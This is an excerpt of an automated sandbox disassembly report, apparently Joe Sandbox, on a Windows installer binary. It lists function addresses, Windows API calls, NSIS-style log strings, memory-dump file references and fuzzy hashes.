                                                                                                                                                                                                                                                                                            • CreateBrushIndirect.GDI32(?), ref: 00403E8B
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1692748467.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692728633.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692777079.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692795954.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692795954.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692795954.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692795954.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692916425.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 2320649405-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 2cd1843f4009558aed8999710a19f2fd839bd0fd7577925b5fb66d8747ca327a
                                                                                                                                                                                                                                                                                            • Instruction ID: 46e75ec11a9703e62b9e59528547c83071966f0b6f932d53464b5ad1ffaeee7a
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2cd1843f4009558aed8999710a19f2fd839bd0fd7577925b5fb66d8747ca327a
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CA116371500744ABCB219F78DD08B5BBFF8AF40715F048A2AE895E22A1D738DA44CB94
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                              • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                                              • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                                              • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,00424579,74DF23A0,00000000), ref: 00404FD6
                                                                                                                                                                                                                                                                                              • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,00424579,74DF23A0,00000000), ref: 00404FE6
                                                                                                                                                                                                                                                                                              • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00424579,74DF23A0,00000000), ref: 00404FF9
                                                                                                                                                                                                                                                                                              • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                                                                                                                                                                                                                                                              • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                                                                                                                                                                                                                                              • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                                                                                                                                                                                                                                              • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                                                                                                                                                                                                                                              • Part of subcall function 00405C6B: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00461DD0,Error launching installer), ref: 00405C90
                                                                                                                                                                                                                                                                                              • Part of subcall function 00405C6B: CloseHandle.KERNEL32(?), ref: 00405C9D
                                                                                                                                                                                                                                                                                            • WaitForSingleObject.KERNEL32(?,00000064,00000000,000000EB,00000000), ref: 00402288
                                                                                                                                                                                                                                                                                            • GetExitCodeProcess.KERNEL32(?,?), ref: 00402298
                                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00402AF2
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            • Exec: failed createprocess ("%s"), xrefs: 004022C2
                                                                                                                                                                                                                                                                                            • Exec: command="%s", xrefs: 00402241
                                                                                                                                                                                                                                                                                            • Exec: success ("%s"), xrefs: 00402263
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1692748467.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692728633.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692777079.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692795954.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692795954.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692795954.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692795954.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692916425.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: MessageSendlstrlen$CloseHandleProcess$CodeCreateExitObjectSingleTextWaitWindowlstrcatwvsprintf
                                                                                                                                                                                                                                                                                            • String ID: Exec: command="%s"$Exec: failed createprocess ("%s")$Exec: success ("%s")
                                                                                                                                                                                                                                                                                            • API String ID: 2014279497-3433828417
                                                                                                                                                                                                                                                                                            • Opcode ID: 6019f50a09c3a98591d7ac19e214774b8a762e16cd0fcb62cdb4911ff5dda7cf
                                                                                                                                                                                                                                                                                            • Instruction ID: 042007ee205ef60e30064d08c60082207347e2967af2fac5581f577c4c1081ae
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6019f50a09c3a98591d7ac19e214774b8a762e16cd0fcb62cdb4911ff5dda7cf
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4E11A332504115EBDB01BFE1DE49AAE3A62EF04324B24807FF502B51D2C7BD4D51DA9D
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404895
                                                                                                                                                                                                                                                                                            • GetMessagePos.USER32 ref: 0040489D
                                                                                                                                                                                                                                                                                            • ScreenToClient.USER32(?,?), ref: 004048B5
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001111,00000000,?), ref: 004048C7
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,0000113E,00000000,?), ref: 004048ED
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1692748467.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692728633.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692777079.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692795954.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692795954.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692795954.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692795954.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692916425.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Message$Send$ClientScreen
                                                                                                                                                                                                                                                                                            • String ID: f
                                                                                                                                                                                                                                                                                            • API String ID: 41195575-1993550816
                                                                                                                                                                                                                                                                                            • Opcode ID: dd0771fa492b48a0b3c5816c4430d79e7bf8162a268c2264a59d8032563336e2
                                                                                                                                                                                                                                                                                            • Instruction ID: ebefa7930bdcd0e41c689069c6d494cf412fee4c497549fa98469d3d4217857c
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: dd0771fa492b48a0b3c5816c4430d79e7bf8162a268c2264a59d8032563336e2
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7A019E72A00219BAEB00DB94CC85BEEBBB8AF44710F10412ABB10B61D0C3B45A058BA4
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 0040326A
                                                                                                                                                                                                                                                                                            • MulDiv.KERNEL32(00016E00,00000064,000EECB3), ref: 00403295
                                                                                                                                                                                                                                                                                            • wsprintfW.USER32 ref: 004032A5
                                                                                                                                                                                                                                                                                            • SetWindowTextW.USER32(?,?), ref: 004032B5
                                                                                                                                                                                                                                                                                            • SetDlgItemTextW.USER32(?,00000406,?), ref: 004032C7
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            • verifying installer: %d%%, xrefs: 0040329F
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1692748467.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692728633.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692777079.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692795954.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692795954.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692795954.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692795954.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692916425.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Text$ItemTimerWindowwsprintf
                                                                                                                                                                                                                                                                                            • String ID: verifying installer: %d%%
                                                                                                                                                                                                                                                                                            • API String ID: 1451636040-82062127
                                                                                                                                                                                                                                                                                            • Opcode ID: 3861699fe6b90eb98aefdbb76a6aac10e2c6ef9ed100297db3f2db1cf1739afe
                                                                                                                                                                                                                                                                                            • Instruction ID: b5f4dff99bd495ec87a9693a0662ffae913500554fa258d9a040327637eece45
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3861699fe6b90eb98aefdbb76a6aac10e2c6ef9ed100297db3f2db1cf1739afe
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F8014470640109BBEF109F60DC4AFEE3B68AB00309F008439FA05E51E1DB789A55CF58
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • CharNextW.USER32(?,*?|<>/":,00000000,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060C7
                                                                                                                                                                                                                                                                                            • CharNextW.USER32(?,?,?,00000000), ref: 004060D6
                                                                                                                                                                                                                                                                                            • CharNextW.USER32(?,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060DB
                                                                                                                                                                                                                                                                                            • CharPrevW.USER32(?,?,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060EF
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1692748467.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692728633.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692777079.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692795954.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692795954.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692795954.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692795954.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692916425.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Char$Next$Prev
                                                                                                                                                                                                                                                                                            • String ID: *?|<>/":
                                                                                                                                                                                                                                                                                            • API String ID: 589700163-165019052
                                                                                                                                                                                                                                                                                            • Opcode ID: 45da571b5baffeb551c3f596f843ba1ccba930a874212f5238eaf5e1151c3a30
                                                                                                                                                                                                                                                                                            • Instruction ID: be175804d259169a812840791ea7ca7df426672d81dd27f3292f2fdf866f60ab
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 45da571b5baffeb551c3f596f843ba1ccba930a874212f5238eaf5e1151c3a30
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E311C81188022159DB30FB698C4497776F8AE55750716843FE9CAF32C1E7BCDC9182BD
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 004014BF
                                                                                                                                                                                                                                                                                            • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 004014FB
                                                                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 00401504
                                                                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 00401529
                                                                                                                                                                                                                                                                                            • RegDeleteKeyW.ADVAPI32(?,?), ref: 00401547
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1692748467.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692728633.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692777079.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692795954.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692795954.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692795954.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692795954.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692916425.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Close$DeleteEnumOpen
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 1912718029-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 2a270dabeadf4e4f1a4763114e85c5fdf2352e77b68d80cc92c62b7e226f3bc1
                                                                                                                                                                                                                                                                                            • Instruction ID: c67b0bc93acae55c3864b02ebd95f02f7c15995ce12be8144693d1f813214158
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2a270dabeadf4e4f1a4763114e85c5fdf2352e77b68d80cc92c62b7e226f3bc1
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: EB117976500008FFDF119F90ED859AA3B7AFB84348F004476FA0AB5070D3358E509A29
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • GetDlgItem.USER32(?), ref: 004020A3
                                                                                                                                                                                                                                                                                            • GetClientRect.USER32(00000000,?), ref: 004020B0
                                                                                                                                                                                                                                                                                            • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 004020D1
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 004020DF
                                                                                                                                                                                                                                                                                            • DeleteObject.GDI32(00000000), ref: 004020EE
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1692748467.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692728633.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692777079.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692795954.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692795954.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692795954.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692795954.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692916425.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 1849352358-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 06a5835b44d3b6ac96e348dee9128c473dfe3a95b4f6450d10307ae5d6bb1818
                                                                                                                                                                                                                                                                                            • Instruction ID: 8f71947f799b2f64a69df86d2a8dcb393400c967cd863db52f2ee5b4f8782dab
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 06a5835b44d3b6ac96e348dee9128c473dfe3a95b4f6450d10307ae5d6bb1818
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9DF012B2A00104BFE700EBA4EE89DEFBBBCEB04305B104575F502F6162C6759E418B28
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401FE6
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401FFE
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1692748467.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692728633.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692777079.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692795954.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692795954.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692795954.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692795954.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692916425.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: MessageSend$Timeout
                                                                                                                                                                                                                                                                                            • String ID: !
                                                                                                                                                                                                                                                                                            • API String ID: 1777923405-2657877971
                                                                                                                                                                                                                                                                                            • Opcode ID: e47ff439633ded3fb17ec5eecd0e1b6806a5c9fa211e2190a11df636c871b995
                                                                                                                                                                                                                                                                                            • Instruction ID: 6a5c1514d43e21eed083d94b15ba6593763dc9af2b3e6337d8774d5f4809249f
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e47ff439633ded3fb17ec5eecd0e1b6806a5c9fa211e2190a11df636c871b995
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 56217171900209BADF15AFB4D886ABE7BB9EF04349F10413EF602F60E2D6794A40D758
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • lstrlenW.KERNEL32(00451D98,%u.%u%s%s,?,00000000,00000000,?,FFFFFFDC,00000000,?,000000DF,00451D98,?), ref: 00404476
                                                                                                                                                                                                                                                                                            • wsprintfW.USER32 ref: 00404483
                                                                                                                                                                                                                                                                                            • SetDlgItemTextW.USER32(?,00451D98,000000DF), ref: 00404496
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1692748467.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692728633.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692777079.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692795954.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692795954.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692795954.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692795954.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692916425.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: ItemTextlstrlenwsprintf
                                                                                                                                                                                                                                                                                            • String ID: %u.%u%s%s
                                                                                                                                                                                                                                                                                            • API String ID: 3540041739-3551169577
                                                                                                                                                                                                                                                                                            • Opcode ID: a810ffe09f2dc908503b2f58e47bd406bb4654f19e43ddd30bdf0acdc5011288
                                                                                                                                                                                                                                                                                            • Instruction ID: 019992b557dc20c415266b5889428492ee6a52d86c3b4952972254649920ef77
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a810ffe09f2dc908503b2f58e47bd406bb4654f19e43ddd30bdf0acdc5011288
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: DC11527270021477CF10AA699D45F9E765EEBC5334F10423BF519F31E1D6388A158259
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                              • Part of subcall function 00401553: RegOpenKeyExW.ADVAPI32(?,00000000,00000022,00000000,?,?), ref: 0040158B
                                                                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(00000000), ref: 0040282E
                                                                                                                                                                                                                                                                                            • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 0040280E
                                                                                                                                                                                                                                                                                              • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                                              • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            • DeleteRegValue: "%s\%s" "%s", xrefs: 00402820
                                                                                                                                                                                                                                                                                            • DeleteRegKey: "%s\%s", xrefs: 00402843
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1692748467.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692728633.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692777079.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692795954.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692795954.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692795954.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692795954.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692916425.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: CloseDeleteOpenValuelstrlenwvsprintf
                                                                                                                                                                                                                                                                                            • String ID: DeleteRegKey: "%s\%s"$DeleteRegValue: "%s\%s" "%s"
                                                                                                                                                                                                                                                                                            • API String ID: 1697273262-1764544995
                                                                                                                                                                                                                                                                                            • Opcode ID: 1c7787f783619d22a727722e8428d119ca1e8f511c7c384e8364c1fbbf216132
                                                                                                                                                                                                                                                                                            • Instruction ID: 70287f52249eeba914cab3bee2f8f529b2cd5257afac1a85b0186071c419a2a5
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1c7787f783619d22a727722e8428d119ca1e8f511c7c384e8364c1fbbf216132
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2511E732E00200ABDB10FFA5DD4AABE3A64EF40354F10403FF50AB61D2D6798E50C6AD
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                              • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                                              • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                                              • Part of subcall function 00406301: FindFirstFileW.KERNELBASE(00461E18,00466A20,00461E18,004067FA,00461E18), ref: 0040630C
                                                                                                                                                                                                                                                                                              • Part of subcall function 00406301: FindClose.KERNEL32(00000000), ref: 00406318
                                                                                                                                                                                                                                                                                            • lstrlenW.KERNEL32 ref: 004026B4
